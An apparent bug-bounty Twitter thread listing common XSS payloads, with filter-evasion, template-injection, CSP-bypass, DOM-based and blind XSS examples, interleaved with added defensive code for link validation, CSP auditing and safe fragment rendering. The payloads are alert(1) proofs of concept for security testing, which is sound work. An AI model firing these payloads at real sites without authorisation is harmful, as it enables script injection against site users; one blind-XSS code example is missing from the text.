Ankita Dhakar
Jul 18, 24 tweets, 5 min read
Do you love XSS as much as I do? 🐞

Sharing 10 common XSS payloads and how to use them for bug bounty hunting💰

Ready to level up your XSS skills? Let’s go! 🧵👇
XSS is one of the most common web bugs. It allows an attacker to inject malicious code into a web page that can execute in the browser of a victim.

Here are common XSS payloads that you can use to test for XSS vulnerabilities and earn some bounties💰

Let’s get started! 👇
The simplest XSS payload is just a script tag with an alert function. This will pop up a message box on the victim’s browser.

<script>alert(1)</script>

You can also use other functions like confirm, prompt, or console.log.
Sometimes, the script tag is filtered or escaped by the web app. In that case, you can try other HTML tags whose event-handler attributes execute JavaScript, such as img, svg, div, etc.

For example, this payload will trigger an alert when the image fails to load:

<img src=x onerror=alert(1)>
Another way to bypass script tag filtering is to use different encodings, such as hexadecimal, decimal, or base64. You can use online tools like url-encode-decode.com to encode your payload.
For example, this payload is equivalent to <script>alert(1)</script> but URL-encoded, with each character written as a hex escape:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
Sometimes, the web app uses a whitelist of allowed HTML tags or attributes. In that case, you can try to find a way to break out of the context and inject your payload 👇🏾
For eg, if the web application allows `<a>` tags with `href` attributes, you can try this payload:

`<a href="javascript:alert(1)">Click me</a>`

This will execute the JavaScript code when the user clicks on the link.
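Defensive counterpart to the `javascript:` link above, added here and not part of the thread: validate the scheme of a user-supplied href with the WHATWG URL parser rather than by string matching, then entity-encode on output. The base URL `https://example.com/` (used to resolve relative links) and the function names are assumptions.

```javascript
// Added example (not from the thread). The URL parser trims leading
// whitespace and lower-cases the scheme, so variants such as
// " JavaScript:" are normalised before the allowlist check runs.

const ALLOWED_PROTOCOLS = new Set(["http:", "https:", "mailto:"]);
const BASE_URL = "https://example.com/"; // assumed site origin

// Returns true only when `href` parses and resolves to an allowed scheme.
function isSafeHref(href) {
  let parsed;
  try {
    parsed = new URL(String(href), BASE_URL);
  } catch {
    return false; // unparseable input is rejected, never passed through
  }
  return ALLOWED_PROTOCOLS.has(parsed.protocol);
}

// Entity-encode for the HTML attribute and text contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Builds an <a> element: unsafe hrefs are replaced with "#", and both the
// href and the link text are encoded for their HTML context.
function renderLink(href, text) {
  const target = isSafeHref(href) ? new URL(href, BASE_URL).href : "#";
  return `<a href="${escapeHtml(target)}">${escapeHtml(text)}</a>`;
}
```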
Another common XSS vector is through CSS.

You can inject CSS code that can execute JavaScript using the expression or url properties. Both are legacy behaviours (CSS `expression()` is old Internet Explorer only, and modern browsers do not run `javascript:` URLs inside CSS), so this mostly matters for legacy applications and browsers.

For example, this payload will trigger an alert when the CSS is applied:

<style>*{background:url(javascript:alert(1))}</style>
Sometimes, the web application uses a template engine or a framework that has its own syntax for rendering dynamic content. You can try to exploit these syntaxes to inject your payload 👇🏾
For example, if the web app uses AngularJS, you can try this payload:

`{{constructor.constructor('alert(1)')()}}`

This will execute the JavaScript code using the constructor property of the AngularJS scope object.
Another way to exploit template engines or frameworks is to use their built-in filters or directives that can execute JavaScript.

For example, if the web application uses Vue.js, you can try this payload:

<div v-html="$options.constructor.constructor('alert(1)')()">
The above will execute the JavaScript code using the constructor property of the Vue.js options object.
Sometimes, the web app uses a Content Security Policy (CSP) that restricts the sources of scripts that can be executed. In that case, you can try to find a way to bypass the CSP and inject your payload.
For example, if the web application allows scripts from example.com, you can try to host your payload on that domain and load it using a script tag:

<script src=https://example.com/xss.js></script>
Another way to bypass CSP is to use a trick called JSONP hijacking. JSONP is a method of loading JSON data from a different domain using a script tag. If the web app uses JSONP and does not validate the callback parameter, you can inject your payload as the callback function name.
For example, if the web application loads JSON data from example.com/data.json?call…, you can try this payload:

<script src=https://example.com/data.json?call…></script>

This will execute the alert function with the JSON data as the argument.
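The two CSP bypasses above (an allowed host serving your file, and a JSONP endpoint on an allowed host) both rely on host allowlists. As an added example, not from the thread, here is a small audit of a policy's `script-src` directive that flags those shapes and passes the nonce plus `'strict-dynamic'` form that makes browsers ignore host allowlists. Both policies and the function names are constructed for the example.

```javascript
// Added example (not from the thread): audit a CSP string for script-src
// weaknesses. Findings are plain strings; an empty list means nothing flagged.

function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

function auditScriptSrc(policy) {
  const d = parseCsp(policy);
  const sources = d.get("script-src") || d.get("default-src");
  if (!sources) return ["no script-src or default-src: scripts are unrestricted"];
  const findings = [];
  const hasNonceOrHash = sources.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  const strictDynamic = sources.includes("'strict-dynamic'");
  if (sources.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("'unsafe-inline' without nonce/hash: inline payloads run");
  }
  if (sources.includes("'unsafe-eval'")) {
    findings.push("'unsafe-eval': eval/Function string-to-code paths allowed");
  }
  if (sources.some((s) => s === "*" || /^(https?|data|blob):$/.test(s))) {
    findings.push("wildcard or scheme-only source: scripts from any host allowed");
  }
  // Host sources are anything that is not a quoted keyword or a bare scheme.
  // Without 'strict-dynamic' they form an allowlist, which is what the
  // hosted-file and JSONP bypasses in the thread take advantage of.
  const hosts = sources.filter((s) => !s.startsWith("'") && !/^[a-z]+:$/.test(s) && s !== "*");
  if (hosts.length > 0 && !strictDynamic) {
    findings.push(`host allowlist (${hosts.join(", ")}) without 'strict-dynamic': ` +
      "bypassable via JSONP or hosted files on an allowed host");
  }
  return findings;
}

// Constructed policies: the first has the shape the thread bypasses.
const WEAK_POLICY = "default-src 'self'; script-src 'self' example.com 'unsafe-inline'";
const STRONG_POLICY = "default-src 'self'; script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'";
```

The nonce in STRONG_POLICY must be generated fresh per response and attached to every legitimate script tag; a static value would be no better than an allowlist.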
Finally, you can also use advanced techniques such as DOM-based XSS or blind XSS to exploit XSS vulnerabilities that are not reflected in the response or are triggered in a different context.
DOM-based XSS occurs when the JavaScript code on the web page uses user input to manipulate the DOM without proper sanitization. For example, this code is vulnerable to DOM-based XSS:

`document.write(location.hash)`
You can exploit ☝🏾 by appending your payload as the hash value in the URL:

`example.com/#<script>alert(1)</script>`
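Added example, not the thread's code: the `document.write(location.hash)` sink modelled next to a hardened version that decodes the fragment once and then encodes it for the HTML text context (the same effect as assigning it to `element.textContent`). The functions take the hash string as input so they run without a DOM; the sample inputs are constructed from the thread's raw and hex-encoded payloads.

```javascript
// Added example (not from the thread). document.write hands the raw
// fragment to the HTML parser, so markup in it becomes live markup; the
// hardened sink treats the fragment as data.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Models the vulnerable sink: whatever follows '#' is emitted as HTML.
function renderHashUnsafe(hash) {
  return hash.replace(/^#/, "");
}

// Hardened sink: percent-decode once (the fragment may arrive encoded, as
// with the hex payload earlier in the thread), then entity-encode. A stray
// '%' makes decodeURIComponent throw; the raw text is kept in that case.
function renderHashSafe(hash) {
  let value = hash.replace(/^#/, "");
  try {
    value = decodeURIComponent(value);
  } catch {
    // malformed percent-encoding: keep the raw text rather than drop it
  }
  return escapeHtml(value);
}

// Illustrative check only: does the emitted string still open a tag?
function containsMarkup(html) {
  return /<\/?[a-zA-Z!]/.test(html);
}

// Constructed inputs, taken from the thread's payloads.
const SAMPLE_RAW = "#<script>alert(1)</script>";
const SAMPLE_HEX = "#%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e";
```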
Blind XSS occurs when the user input is stored on the server and later rendered on a different web page that is viewed by another user, such as an admin or a moderator.
For example, this code is vulnerable to blind XSS:

You can exploit it by submitting your payload as the comment:

`<script>alert(1)</script>`

You can use tools like xsshunter.com to generate a blind XSS payload that will notify you when it is executed.
That's it for this thread. I hope you learned something new and useful about XSS.

If you did, please like and retweet to spread the word. 🙏

Happy hunting! 🐞
